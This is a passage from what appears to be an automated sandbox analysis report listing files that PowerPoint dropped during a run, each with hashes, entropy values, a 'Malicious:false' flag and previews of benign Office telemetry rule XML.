                                                                                                                              SSDEEP:24:2deuddRgeTukPSAsx+AQ0ehi+JWEbWWEieeqiK5fejM:c1fRgeT8lx+9pYEbREBZ
                                                                                                                              MD5:B0C15D905CF6BB86A791D25D695D5034
                                                                                                                              SHA1:5A8CD74F5879E46F852047535998230A6DD9C77F
                                                                                                                              SHA-256:30D89B15725CEF2D6CFF1C1DE721F454C5485EC3600EE6E9E0A6CD52D940F143
                                                                                                                              SHA-512:B62EBE2F4879268985B56D6CEC6DDACC9159E89A5B1783A199B6E9BFFFF7F80C0F2C11936DA79B7BBD898B08ACF7598D735EF12957D6C2FA0F9AEF0A30F6C09F
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="10450" V="3" DC="SM" EN="Office.Outlook.Desktop.NDBCorruptStoreRule" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" SP="CriticalUsage" DCa="PSU" xmlns="">.. <S>.. <Etw T="1" E="319" G="{2adf8e23-0af9-43c9-ba4c-952ee130540d}" />.. </S>.. <C T="FT" I="0" O="false" N="CollectionTime">.. <S T="1" F="TimeStamp100ns" />.. </C>.. <C T="U32" I="1" O="false" N="Context">.. <S T="1" F="Context" />.. </C>.. <C T="U32" I="2" O="false" N="NdbType">.. <S T="1" F="NdbType" />.. </C>.. <C T="U32" I="3" O="false" N="Version">.. <S T="1" F="Version" />.. </C>.. <C T="W" I="4" O="false" N="ProcessName">.. <S T="1" F="ProcessName" />.. </C>.. <C T="W" I="5" O="false" N="PstVersion">.. <S T="1" F="PstVersion" />.. </C>.. <C T="W" I="6" O="false" N="Details">.. <S T="1" F="Details" />.. </C>.. <C T="U32" I="7" O="true" N="CreatedWithVersion">.. <S T="1" F="CreatedWithVersion" M="Ignor
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2690
                                                                                                                              Entropy (8bit):3.9078381910356925
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d7OrgdAFxFzFobQFPFXX8XXXsF8krtr9+w9t19Vw9Qtf:c7OFLNoQp1X8HXaZrJNv1keN
                                                                                                                              MD5:349928DBC417DBABF83BCCF623718BE8
                                                                                                                              SHA1:E8AD2264C660C5DA5BA4BB72010ECD4F75A55810
                                                                                                                              SHA-256:D5996B4EB38900CBC00BF99C2BF2AB398B229F1B68243EEC3A1598EE8DDA5CF3
                                                                                                                              SHA-512:44E4084B78B9BC8BC5C25C401FEEA60E9BBFF3470E338AA2576E4FBA5D0A19A75A2DAC4EDEAD6EBCF6783CF18B72B03C77826F144637782D7C66DE43D2DC81D1
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="10625" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bdruu" />.. </S>.. <C T="I32" I="0" O="false">.. <S T="1" F="searchAlgorithmVersion" />.. </C>.. <C T="B" I="1" O="false">.. <O T="EQ">.. <L>.. <S T="1" F="SelectedIndex" />.. </L>.. <R>.. <V V="0" T="I32" />.. </R>.. </O>.. </C>.. <C T="B" I="2" O="false">.. <O T="EQ">.. <L>.. <S T="1" F="SelectedIndex" />.. </L>.. <R>.. <V V="1" T="I32" />.. </R>.. </O>.. </C>.. <C T="B" I="3" O="false">.. <O T="EQ">.. <L>.. <S T="1" F="SelectedIndex" />.. </L>.. <R>.. <V V="2" T="I32" />.. </R>.. </O>.. </C>.. <C T="B" I="4" O="false">.. <O T="EQ">.. <L>.. <S T="1" F="SelectedIndex" />.. </L>.. <R>.. <V V="3" T="I32" />.. </R>.. </O>.. </C>.. <C T="B" I="5" O="false">.. <O T="EQ">.. <L>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1341
                                                                                                                              Entropy (8bit):4.836265291604784
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdSBVzjRGNdRDDHwpatEervc1NQzDeze9bbTu6oXHaSMt6lzXAWNOLSXdRTcIX:2dSB6dRgeLr+qJSlzQpoFn1J+Q+17Ju
                                                                                                                              MD5:62B246F01735D691F6D39795331FCB25
                                                                                                                              SHA1:CCBFBCD2BC7709252234C88C158724368D7180B8
                                                                                                                              SHA-256:244E300E1802580DE0A76CC73FEC6161563037FD30FBB7E78DF2682A2996B3BA
                                                                                                                              SHA-512:E41680AD13498202E1BA9208C7BFEBF47FA8C24C86BA379ABDD51001100F2F93409B7C5DDDF15803FFA6C1728EC400FF17916D57333BD563B719E2F7227E27D6
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="10626" V="1" DC="SM" EN="Office.Outlook.Desktop.PeoplePickerSelectionSourceHitRate" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bdrut" />.. <TI T="2" I="Daily" />.. <A T="3" E="TelemetryShutdown" />.. </S>.. <G>.. <S T="1">.. <F N="searchSourceId" />.. <F N="searchSourceName" />.. </S>.. </G>.. <C T="I32" I="0" O="false" N="SearchSourceId">.. <S T="1" F="searchSourceId" />.. </C>.. <C T="U32" I="1" O="false" N="ExecutionCount">.. <C>.. <S T="1" />.. </C>.. </C>.. <C T="I32" I="2" O="false" N="FoundUserSelectedItemCount">.. <A T="SUM">.. <S T="1" F="didSourceFindResult" />.. </A>.. </C>.. <C T="W" I="3" O="false" N="SearchSourceName">.. <S T="1" F="searchSourceName" />.. </C>.. <C T="U32" I="4" O="false" N="SearchSourceFinishedCount">.. <A T="SUM">.. <S T="1" F="didSourceFinish" />.. </
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1779
                                                                                                                              Entropy (8bit):4.763988090772443
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2dUah8dRge8Wqw//tbQz1HAQcV6AQVeQ+fFQxNoQyQBQdoQmf:cUa6RgelqwHts5FzlVP+St7+d9mf
                                                                                                                              MD5:DC41E43C5B36CEF2AE702A73F26BE79C
                                                                                                                              SHA1:F743367DC7AB80DAE6CEE0D7378ACB0436F780C5
                                                                                                                              SHA-256:CEAFB6A575942193E5E532DD6AC3B0B849C42CDBFEDCB929ABAFB854315808C4
                                                                                                                              SHA-512:87C72CBCBF56DBD14A6FC9F25C9D552551946E9EF99F6D064D113F490A8A110C187B6ABF3E51A3DC828F01A1816913294D6906ADA5F457356213090EE81F888F
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="10627" V="1" DC="SM" EN="Office.Outlook.Desktop.PeoplePickerSelectionSourceRelevancy" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns="">.. <S>.. <R T="1" R="11265" />.. <TI T="2" I="Daily" />.. <A T="3" E="TelemetryShutdown" />.. </S>.. <G>.. <S T="1">.. <F N="0" />.. <F N="1" />.. </S>.. </G>.. <C T="I32" I="0" O="false" N="SearchSourceId">.. <S T="1" F="0" />.. </C>.. <C T="W" I="1" O="false" N="SearchSourceName">.. <S T="1" F="1" />.. </C>.. <C T="D" I="2" O="false" N="AverageItemRank">.. <A T="AVG">.. <S T="1" F="2" />.. </A>.. </C>.. <C T="U32" I="3" O="false" N="DisplayNameMatchCount">.. <A T="SUM">.. <S T="1" F="3" />.. </A>.. </C>.. <C T="U32" I="4" O="false" N="EmailAddressMatchCount">.. <A T="SUM">.. <S T="1" F="4" />.. </A>.. </C>.. <C T="U32" I="5" O="false" N="FuzzyMatchCount">.. <A T="SUM">..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):479
                                                                                                                              Entropy (8bit):4.329435177677775
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHddRyberiNereujDb8OKX/c//fpONkMNO/HNUlu:2dd9riYrtuE7
                                                                                                                              MD5:6F934C775A771C17017E8BC2085D9A37
                                                                                                                              SHA1:84B8A31BE7DF60E200DA64A5C3CF9960D0A2F636
                                                                                                                              SHA-256:F0A4C86159BB76DBE5AEFA4ACBD458603FCD36DC672F5D40178B3A7FFE034924
                                                                                                                              SHA-512:F159A83ED11531EA1B3B357947763FE0C053D3E3DF12E5B6C32130D764067748322E7E5A73003AFD7147F682951E6F1A23526B7F8BA227FE1DD4A809525C870D
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="10781" V="1" DC="SM" T="Subrule" xmlns="">.. <S>.. <UTS T="1" Id="bgo4t" />.. <UTS T="2" Id="bhlvy" />.. </S>.. <C T="I32" I="0" O="false">.. <U T="100nsToMs">.. <O T="SUB">.. <L>.. <S T="2" F="TimeStamp100ns" />.. </L>.. <R>.. <S T="1" F="TimeStamp100ns" />.. </R>.. </O>.. </U>.. </C>.. <T>.. <S T="2" />.. </T>.. <ST>.. <S T="1" />.. </ST>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1736
                                                                                                                              Entropy (8bit):4.825673007247234
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:48:cONRgeWqiLsV/6xP+YyKJkyiyqy40yymP7:3RgemLsV/6tnHkcqR01mP7
                                                                                                                              MD5:478DA0EDAF828CE7FAD17CB9A41C741E
                                                                                                                              SHA1:09BF669F108E10E6CFA738C0FBF01612647D5C5F
                                                                                                                              SHA-256:8737205FE766B0B5529AAE314794BD4BB4B1EA7970257289C14A26C54EA97091
                                                                                                                              SHA-512:9002600D2E10E95B9DAF3347F0765826A1248B9D6C776910441C42C4CAD7DAA15F05B1E2B4340D6E91A79BC7E71D47F91B65CFFBE8B535C1FFD2ED5E1085175D
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="10784" V="0" DC="SM" EN="Office.Outlook.Desktop.PeoplePickerSelectionStatistics" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns="">.. <S>.. <R T="1" R="10625" />.. <TI T="2" I="Daily" />.. <A T="3" E="TelemetryShutdown" />.. </S>.. <C T="I32" I="0" O="false" N="AlgorithmVersion">.. <S T="1" F="0" />.. </C>.. <C T="I32" I="1" O="false" N="SelectedIndexPosition0Count">.. <A T="SUM">.. <S T="1" F="1" />.. </A>.. </C>.. <C T="I32" I="2" O="false" N="SelectedIndexPosition1Count">.. <A T="SUM">.. <S T="1" F="2" />.. </A>.. </C>.. <C T="I32" I="3" O="false" N="SelectedIndexPosition2Count">.. <A T="SUM">.. <S T="1" F="3" />.. </A>.. </C>.. <C T="I32" I="4" O="false" N="SelectedIndexPosition3Count">.. <A T="SUM">.. <S T="1" F="4" />.. </A>.. </C>.. <C T="I32" I="5" O="false" N="SelectedIndexPosition4Count">.. <A T="SUM">..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):455
                                                                                                                              Entropy (8bit):4.385258368553274
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHd/fercferSDb8OKX/c//fpONkMNOjsu:2d+rRrt+
                                                                                                                              MD5:D32DB9ADFAAAEE45D3B6AE82A3292BE4
                                                                                                                              SHA1:3F56B0B338398FB2BCCB8EC1645F2D5A07AEA938
                                                                                                                              SHA-256:3967AEC34F6F912314E4B09F719349EE20160EC6E460DB0F4DC55EBD81D2F075
                                                                                                                              SHA-512:326E86F467BF6292A7AF84F058D9990401C3DC1D27F2196060DE94DF2DF73FF8DD8EDAB77D998FA3775AB4C0B4AA4FF4311A58EB9F225E476AD2754465BD1937
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="10800" V="0" DC="SM" T="Subrule" DCa="PSP" xmlns="">.. <S>.. <UTS T="1" Id="bhlvz" />.. <UTS T="2" Id="bhlv0" />.. </S>.. <C T="I32" I="0" O="false">.. <U T="100nsToMs">.. <O T="SUB">.. <L>.. <S T="2" F="TimeStamp100ns" />.. </L>.. <R>.. <S T="1" F="TimeStamp100ns" />.. </R>.. </O>.. </U>.. </C>.. <T>.. <S T="2" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2683
                                                                                                                              Entropy (8bit):3.339202408736384
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdCZfi0DO5Q//WRff/0//ShmMnENWwmhfP/k//ix2Nf/0//g//mhfP/k//4x23:2dCfDyjOOpOO1H1HOcEIO9DO2nP
                                                                                                                              MD5:3F36A9C98F1F9A7C0274B018EA824F2B
                                                                                                                              SHA1:D4D59977A39D2A21F26DEC9A296DDB6DD89E9482
                                                                                                                              SHA-256:FA747FCC832754D1C1F4181E8E225898E66E4FE466940EA53F3FF67A7FEDE0C5
                                                                                                                              SHA-512:AB2E7FB650998947F29EF1C4B99C7ACA4DED646F334B0D6408527A1309A7316441B5464C7B3D5FAE0399051E8EFFBA4A9B9BE53B39C9F59C74AB4274F386D3FA
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="10801" V="0" DC="SM" T="Subrule" DCa="PSP" xmlns="">.. <S>.. <R T="1" R="10781" />.. </S>.. <C T="B" I="0" O="false">.. <O T="LT">.. <L>.. <S T="1" F="0" />.. </L>.. <R>.. <V V="50" T="I32" />.. </R>.. </O>.. </C>.. <C T="B" I="1" O="false">.. <O T="AND">.. <L>.. <O T="GE">.. <L>.. <S T="1" F="0" />.. </L>.. <R>.. <V V="50" T="I32" />.. </R>.. </O>.. </L>.. <R>.. <O T="LT">.. <L>.. <S T="1" F="0" />.. </L>.. <R>.. <V V="100" T="I32" />.. </R>.. </O>.. </R>.. </O>.. </C>.. <C T="B" I="2" O="false">.. <O T="AND">.. <L>.. <O T="GE">.. <L>.. <S T="1" F="0" />.. </L>.. <R>.. <V V="100" T="I32" />.. </R>.. </O>.. </L>.. <R>.. <O T="LT
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2683
                                                                                                                              Entropy (8bit):3.336471169334665
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdxfi0S15Q//WRff/0//ShmMnENWwmhfP/k//ix2Nf/0//g//mhfP/k//4x2NR:2dXkjOOpOO1H1HOcEIO9DO2nP
                                                                                                                              MD5:34009FBF6298E1EAED5DB556C610DCE4
                                                                                                                              SHA1:4023B2C284673A052F31C40F92F1E9E062BFF840
                                                                                                                              SHA-256:BE81E59C2BBA681945CFD10AE299D0AA83B638D0943CBCF5E069F4B28213615F
                                                                                                                              SHA-512:63508D855ABBA44ACDDE3BE0411C7F7CE6385B997679E794D2C45CF7D7EB4D215A2C8975AE5161C6B11B58488949FC5B09BA70D6668FC9E9EED064BCD63548BC
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="10802" V="0" DC="SM" T="Subrule" DCa="PSP" xmlns="">.. <S>.. <R T="1" R="10800" />.. </S>.. <C T="B" I="0" O="false">.. <O T="LT">.. <L>.. <S T="1" F="0" />.. </L>.. <R>.. <V V="50" T="I32" />.. </R>.. </O>.. </C>.. <C T="B" I="1" O="false">.. <O T="AND">.. <L>.. <O T="GE">.. <L>.. <S T="1" F="0" />.. </L>.. <R>.. <V V="50" T="I32" />.. </R>.. </O>.. </L>.. <R>.. <O T="LT">.. <L>.. <S T="1" F="0" />.. </L>.. <R>.. <V V="100" T="I32" />.. </R>.. </O>.. </R>.. </O>.. </C>.. <C T="B" I="2" O="false">.. <O T="AND">.. <L>.. <O T="GE">.. <L>.. <S T="1" F="0" />.. </L>.. <R>.. <V V="100" T="I32" />.. </R>.. </O>.. </L>.. <R>.. <O T="LT
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):667
                                                                                                                              Entropy (8bit):5.004173158996676
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdrBVzjpOsdRDDHwpatE+ic1NerBHNdflLOy0gMOXHISMNOS/HNClu:2drB7DdRgelfYrhT9iYB+Z
                                                                                                                              MD5:C282E64D7711E21DFF8C26BC92417A32
                                                                                                                              SHA1:B088056DD50031CC254CC63DC90C2F377B05C728
                                                                                                                              SHA-256:C36A2D390EC0ADA2B77E271696742CF472024F9732F802AF1333A635CE77A5B6
                                                                                                                              SHA-512:2A93415F4F3F9F93339C79ACDA657ED6E8ABD4EECC3A3C4B300AD1E5DDA5D7559F1C7EAA5EA3DB0F98E672C7F25BA4D695C145FDB2911877701BD89220B4978A
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="11370" V="1" DC="SM" EN="Office.Outlook.Desktop.PcxIMProviderIdStatistics" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns="">.. <S>.. <A T="1" E="TelemetryShutdown" />.. <TI T="2" I="Daily" />.. <UTS T="3" Id="bzplv" />.. </S>.. <G>.. <S T="3">.. <F N="Clsid" />.. </S>.. </G>.. <C T="G" I="0" O="false" N="IMProviderCLSID">.. <S T="3" F="Clsid" />.. </C>.. <C T="U32" I="1" O="false" N="ProviderCount">.. <C>.. <S T="3" />.. </C>.. </C>.. <T>.. <S T="1" />.. <S T="2" />.. </T>.. <ST>.. <S T="3" />.. </ST>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2409
                                                                                                                              Entropy (8bit):4.2355029291387805
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:48:cU7u2RgelfYrTnWQqMJhI8SUmgI8vzwXr0Z:37Rge+SJMw8Sh/8vzwb0Z
                                                                                                                              MD5:0BD0AFBFC2854052B3489BD8764EC93D
                                                                                                                              SHA1:EF5CAC1230CDDBC39884A3ABB5CE5B07D8DE209E
                                                                                                                              SHA-256:8043FD42529C4F6D8AE7AF858B4F60342746F4D3CB5A3E587D6925D93A1ECC11
                                                                                                                              SHA-512:176E5B1386946308370F613064DF81FE4A05903F0417BD2AD6756825E56070A9C4A56BEB681C01BE145CF38B31F7DF951F614C1404F9E0FA62F48C608723D552
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="11381" V="0" DC="SM" EN="Office.Outlook.Desktop.PcxIMProviderCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns="">.. <S>.. <A T="1" E="TelemetryShutdown" />.. <TI T="2" I="Daily" />.. <UTS T="3" Id="bzplv" />.. <F T="4">.. <O T="EQ">.. <L>.. <S T="3" F="Clsid" />.. </L>.. <R>.. <V V="{A0651028-BA7A-4D71-877F-12E0175A5806}" T="G" />.. </R>.. </O>.. </F>.. <F T="5">.. <O T="EQ">.. <L>.. <S T="3" F="Clsid" />.. </L>.. <R>.. <V V="{8885370D-B33E-44b7-875D-28E403CF9270}" T="G" />.. </R>.. </O>.. </F>.. <F T="6">.. <O T="EQ">.. <L>.. <S T="3" F="Clsid" />.. </L>.. <R>.. <V V="{5C4C8078-24CF-4C71-B05E-8B1D935DB5AC}" T="G" />.. </R>.. </O>.. </F>.. <F T="7">.. <O T="AND">.. <L>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):10729
                                                                                                                              Entropy (8bit):4.199919152742344
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:96:kRgezufyyYyoZqZ8rsIYnhl+itZXq/qh8gk2nANwvNFte8W8c8eu8O8dUJLltLq9:kDgyxlEdy/ozM2JLltOrZ
                                                                                                                              MD5:1BD4B6968BFED45AAEC164FC1424786E
                                                                                                                              SHA1:C69191E8465A30427CA4BA4661DFA8ADBD3DE362
                                                                                                                              SHA-256:36D4F2474508E536B344342B83057AD723C339F2B43D51C7F43756AFC458201E
                                                                                                                              SHA-512:59F6E64D219E8D05A79E9368BB5390745C293ECEABB46E8E62961890B05DD10F1F9C1C99D9DC37BDE16E427C11BF1F31B39A1B5C88AB90B7C7E06625879F829D
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="11446" V="1" DC="SM" EN="Office.Outlook.Desktop.PCXContactCard2LinkedInBasicUsage" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns="">.. <S>.. <A T="1" E="TelemetryShutdown" />.. <TI T="2" I="Daily" />.. <UTS T="3" Id="blelm" />.. <UTS T="4" Id="b3ko4" />.. <UTS T="5" Id="b3ko5" />.. <UTS T="6" Id="b3ko6" />.. <UTS T="7" Id="b3ko7" />.. <UTS T="8" Id="b3143" />.. <UTS T="9" Id="b3142" />.. <UTS T="10" Id="b3144" />.. <UTS T="11" Id="b3145" />.. <F T="12">.. <O T="AND">.. <L>.. <O T="EQ">.. <L>.. <S T="4" F="NameLength" />.. </L>.. <R>.. <V V="0" T="U32" />.. </R>.. </O>.. </L>.. <R>.. <O T="EQ">.. <L>.. <S T="4" F="TotalMatches" />.. </L>.. <R>.. <V V="0" T="U32" />..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):473
                                                                                                                              Entropy (8bit):5.169007843122619
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdFVzj7dRDDHwpat5rerKHuSn8UMNO2su:2dFVdRgewrGk
                                                                                                                              MD5:6D7684ED89F01B1F25F22CCCEB188D18
                                                                                                                              SHA1:B0A430410B55AAA957CAAF584DD9D6FA8349D92D
                                                                                                                              SHA-256:71AA44019046EBE311685A30A99C4B53E1473464B833B176D26ACFC2A8A540C3
                                                                                                                              SHA-512:DB07473F10C9BE776B312CED56E3073C7715661E0EAF54909AD57E00165C171508C48C928D101AE7B405F7D73E2768F47B502018E0F3DFE6A12CBCAEDBBA87E5
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="11464" V="1" DC="SM" EN="Office.Outlook.Desktop.LinkedInToggle" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" S="10" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="b5k4o" />.. </S>.. <C T="U32" I="0" O="false" N="LinkedInToggleAPI">.. <S T="1" F="Function" />.. </C>.. <C T="B" I="1" O="false" N="Enabled">.. <S T="1" F="fEnabled" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):413
                                                                                                                              Entropy (8bit):5.3475921100141175
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdw4VzjmtFH6dRDDHwpat5Gger1U5+TXZNO2su:2dlcFH6dRgeAr7Tf
                                                                                                                              MD5:17A3609F404082A6029B68CFD8B74234
                                                                                                                              SHA1:080F0449F9F12778E381D7CCA5E35C4CC5D5A042
                                                                                                                              SHA-256:BEF5C21FA8BDD1A3D599376797F5A5435C6E4139641CE156FFF9C95453B610BA
                                                                                                                              SHA-512:0521E03E89189423F3019DC500455395F300B3B7E0CD57833A02F2D8BEAD9B5C96EE04189629B3035FE7914894B38C9824B64EFB739C73FA90EA745DC3DEC632
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="11498" V="0" DC="SM" EN="Office.Outlook.Desktop.LinkedInSettingsHTTPRequestError" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" S="500" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="b5vgr" />.. </S>.. <C T="U32" I="0" O="false" N="HttpRequestFailure">.. <S T="1" F="HRESULT" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1452
                                                                                                                              Entropy (8bit):4.357045061379154
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2dw2BdRgelfYrBGUJ90XwOaPJiAGJTR0ZymN+9ZZ:cw2rRgelfYlGQaQtsR3ZZ
                                                                                                                              MD5:89BC403254C78D9DE16F871CC90D62B1
                                                                                                                              SHA1:60345156473DC978ECB07A6C690C0D31FF1BDFC6
                                                                                                                              SHA-256:BF73007C777271C877AE39A21A7D98FB1EF752D59AB0B157B06B3627481E53B0
                                                                                                                              SHA-512:B3C832F7B1B014006F9C09FACD894B614254D146B7134D96349AD60D7613A649F05FC7369FB260C51F82182384C6FF62E9B6115A698260E88E91CF4163C3706C
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="11499" V="0" DC="SM" EN="Office.Outlook.Desktop.LinkedInSettingsGetEnabledGraphResult" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns="">.. <S>.. <A T="1" E="TelemetryShutdown" />.. <TI T="2" I="Daily" />.. <UTS T="3" Id="b5vg1" />.. <F T="4">.. <O T="AND">.. <L>.. <S T="3" F="Tenant enabled" />.. </L>.. <R>.. <S T="3" F="User enabled" />.. </R>.. </O>.. </F>.. <F T="5">.. <O T="EQ">.. <L>.. <S T="3" F="Tenant enabled" />.. </L>.. <R>.. <V V="false" T="B" />.. </R>.. </O>.. </F>.. <F T="6">.. <O T="AND">.. <L>.. <S T="3" F="Tenant enabled" />.. </L>.. <R>.. <O T="EQ">.. <L>.. <S T="3" F="User enabled" />.. </L>.. <R>.. <V V="false" T="B" />.. <
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):552
                                                                                                                              Entropy (8bit):5.158050495180622
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdrjVzjmjhdRDDHwpatE+ic1Ner/yeXHISMNOS/HNClu:2dvmdRgelfYrL+Z
                                                                                                                              MD5:B0B0428D2DAC2ACC68088D0FA6968995
                                                                                                                              SHA1:42CEE8EAEAC216FEE697FA2146BB5786AC20D813
                                                                                                                              SHA-256:6C4CE6976D89FBBC99EB4118900AF1D92F1659CE9536CA4316DED6CD09949623
                                                                                                                              SHA-512:4C243EEA3EBD6942A8267DA8430C1F7C8A1540D6DE189A70FEF837C1FEA33B5BC7E910A058C5DE40681FCAC9C7A2F402542D173782AF08BF18F69BC37FE276F0
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="11500" V="0" DC="SM" EN="Office.Outlook.Desktop.LinkedInSettingsGetEnabledFailed" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns="">.. <S>.. <A T="1" E="TelemetryShutdown" />.. <TI T="2" I="Daily" />.. <UTS T="3" Id="b5vg2" />.. </S>.. <C T="U32" I="0" O="false" N="LinkedInSettingsGetEnabledFailureCount">.. <C>.. <S T="3" />.. </C>.. </C>.. <T>.. <S T="1" />.. <S T="2" />.. </T>.. <ST>.. <S T="3" />.. </ST>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):990
